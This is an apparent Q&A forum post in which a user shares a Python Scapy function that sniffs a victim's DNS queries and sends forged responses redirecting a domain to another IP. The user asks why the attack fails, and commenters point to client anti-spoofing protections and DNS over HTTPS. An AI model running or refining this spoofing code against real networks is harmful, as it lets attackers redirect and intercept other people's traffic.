0

I'm trying to perform DNS spoofing but seems it doesn't impact the victim, The packet is showing on Wireshark the way it needs to be but still, the victim gets to the correct IP and not the one I wants to (facebook.com)

def dns_spoof(pkt):
    redirect_to = '157.240.195.35' # facebook.com IP

    spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                    UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                    DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa = 1, qr=1, \
                    an=DNSRR(rrname=pkt[DNS].qd.qname,  ttl=10, rdata=redirect_to))
    send(spoofed_pkt)

pk = sniff(lfilter=filtering, prn=dns_spoof)# main

picture from Wireshark: (trying to spoof when victim enter cool.com) enter image description here

Why doesn't it work?

Victor Hanukayev
  • 19
  • 7
  • There are anti-spoofing protections in modern DNS clients. – Barmar Feb 25 '21 at 21:55
  • so theoretically the code should work but because of the protections, it doesn't? How can I make it work? – Victor Hanukayev Feb 25 '21 at 21:59
  • You can't, that's the whole point of anti-spoofing protections. – Barmar Feb 25 '21 at 22:00
  • transaction id of response should match transaction id of request for victim to accept "fake" response – Maxim Sagaydachny Feb 26 '21 at 15:46
  • @MaximSagaydachny which is already the case here: "id=pkt[DNS].id". Which is one anti-spoofing method but certainly not the only one. The question is anyway offtopic here as not related to programming (and missing important details anyway, like the network setup, who and where the victim is, which applications - browsers do use DNS over HTTPS nowadays, etc.). – Patrick Mevzek Feb 26 '21 at 20:27

0 Answers0